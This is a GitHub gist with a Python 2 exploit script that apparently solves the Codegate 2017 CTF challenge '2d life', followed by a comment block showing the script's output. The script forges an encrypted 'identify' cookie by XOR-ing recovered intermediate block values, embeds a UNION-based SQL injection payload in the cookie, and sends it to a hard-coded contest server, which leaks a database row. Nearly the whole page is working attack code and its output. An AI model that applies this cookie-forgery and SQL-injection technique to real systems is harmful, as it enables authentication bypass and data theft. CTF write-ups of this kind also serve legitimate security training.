Created
February 14, 2017 09:19
-
-
Save bongtrop/98e24696147e168f459f577af664c754 to your computer and use it in GitHub Desktop.
codegate 2017 2d life
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from base64 import b64decode as decode | |
from base64 import b64encode as encode | |
import requests | |
import urllib | |
import re | |
def xor(a, b): | |
res = [] | |
for i in range(len(a)): | |
res.append(chr(ord(a[i])^ord(b[i]))) | |
return res | |
def show(m, content): | |
if m: | |
print repr(m.group(1)) | |
else: | |
print r.content.split("\n")[-1] | |
print urllib.quote_plus(cookie_identify) | |
exit() | |
# Cookie: identify=U20iNldnibI%3D%7Ci%2FP0b7Csidg7Y7LTtSqz3dqRXMh2bY8VqBU%2F90kj9aih1qT7X%2BmyjwEalzVAHA9woq0ZSaOa%2BH7b2nblXS6mrA%3D%3D | |
# U20iNldnibI=|i/P0b7Csidg7Y7LTtSqz3dqRXMh2bY8VqBU/90kj9aih1qT7X+myjwEalzVAHA9woq0ZSaOa+H7b2nblXS6mrA== | |
cookie_p1_b64 = "U20iNldnibI=" | |
cookie_p2_b64 = "i/P0b7Csidg7Y7LTtSqz3dqRXMh2bY8VqBU/90kj9aih1qT7X+myjwEalzVAHA9woq0ZSaOa+H7b2nblXS6mrA==" | |
cookie_p1 = list(decode(cookie_p1_b64)) | |
cookie_p2 = list(decode(cookie_p2_b64)) | |
# pl = ";;0 union select 1,2,3,4,5" | |
# pl = ";;0 union select * from agents limit 10,1" | |
# pl = "WTF GGWP ;F14G;0" | |
pl = ";;0 union select 1,2,d,4,5 from(select 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#" | |
payload = [] | |
for i in range(0,len(pl),8): | |
payload.append(pl[i:i+8]) | |
if len(payload[-1])<8: | |
payload[-1] += chr(8-len(payload[-1]))*(8-len(payload[-1])) | |
else: | |
payload.append("\x08"*8) | |
imd_1 = list("1e2871651620cc92".decode("hex")) | |
imd_2 = list("cda1bb2290ffd981".decode("hex")) | |
cookie_p2_tmp_e = cookie_p2[8:16] | |
dummy = ";g;bongt" | |
for i in range(len(payload)-1,-1,-1): | |
cookie_p2_tmp_s = cookie_p2[:8] | |
cookie_p2_tmp_e = xor(list(payload[i]), imd_2) + cookie_p2_tmp_e | |
if i!=0: | |
cookie_p1_tmp = xor(list(dummy), imd_1) | |
cookie_p2_tmp = cookie_p2_tmp_s + cookie_p2_tmp_e | |
else: | |
cookie_p1_tmp = xor(list(payload[0]), imd_2) | |
cookie_p2_tmp = cookie_p2_tmp_e | |
cookie_p1_raw = encode("".join(cookie_p1_tmp)) | |
cookie_p2_raw = encode("".join(cookie_p2_tmp)) | |
cookie_identify = cookie_p1_raw + "|" + cookie_p2_raw | |
cookies = {"identify": urllib.quote_plus(cookie_identify) } | |
r = requests.get("http://110.10.212.147:24135/?p=secret_login", cookies=cookies) | |
m = re.search(r"<font size=6>(.+?)</font>", r.content, re.DOTALL) | |
show(m, r.content) | |
if i!=0: | |
m = re.search(r"[:]bongt(.{8})", r.content, re.DOTALL) | |
imd_2 = xor(cookie_p2[:8], list(m.group(1))) | |
else: | |
m = re.search(r"Input your ID card, (.+)", r.content) | |
show(m, r.content) | |
print urllib.quote_plus(cookie_identify) | |
# Output | |
''' | |
'Hello, g<br> Your Rank :bongt]\xfa \x88\x07\x9e\x95\xc1' | |
'Hello, g<br> Your Rank :bongt\xf7\x87\x8f\xa4\xaa\x842\x8cit 11,1#' | |
'Hello, g<br> Your Rank :bongt\x10\xb79\xdc\x00j\xa3\x16ts)t limit 11,1#' | |
'Hello, g<br> Your Rank :bongt\xbe\x1d\x84LZ5{\x84rom agents)t limit 11,1#' | |
'Hello, g<br> Your Rank :bongt\xbe\xa6\xdd\x9d\xf6\xc1\xda\xb7lect * from agents)t limit 11,1#' | |
'Hello, g<br> Your Rank :bongt\x85B\x87t\xcd\n\xc4\xd6union select * from agents)t limit 11,1#' | |
'Hello, g<br> Your Rank :bongt\x80\x00\xab@\xf3\xa3\x8c\x96d`,5`e` union select * from agents)t limit 11,1#' | |
'Hello, g<br> Your Rank :bongtA\x9d5\x867\x85\x8a\xca,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#' | |
'Hello, g<br> Your Rank :bongt\x92\xedJ\xd4\x03\\\\\xb4`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#' | |
'Hello, g<br> Your Rank :bongt\xf9\xe50\xc6k,\xc7Sselect 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#' | |
'Hello, g<br> Your Rank :bongt\xe9\xe4L\x12\xa7\x9bR\xba,5 from(select 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#' | |
'Hello, g<br> Your Rank :bongt:J\x01\x97\xb3a-C 1,2,d,4,5 from(select 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#' | |
'Hello, g<br> Your Rank :bongt\xe8>\xfc|\xe9\x82\xb18n select 1,2,d,4,5 from(select 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#' | |
'Hello, <br> Your Rank :0 union select 1,2,d,4,5 from(select 1`a`,2`b`,3`c`,4`d`,5`e` union select * from agents)t limit 11,1#' | |
'/ef84ebb40ab390a1430c233c1f6be444/cfbe97eb17869a6c40f06e62119e7993.png' | |
WPY4MyxAUY8%3D%7CWPY4MyxAUY%2FfmYadb6jH70ImlE87U%2FdWXiPkz6nvI6Nqe9Le0IT1XaoPocW1SWFyJ8A%2FTCMjMS5q0V8uHcMtLkA7QJ0oTSAKWYsTV8qz0jrpK6CT0aFPoAgHUr86RNI5v3301oYeLTrFqbMqmPfRiTtjstO1KrPd | |
''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment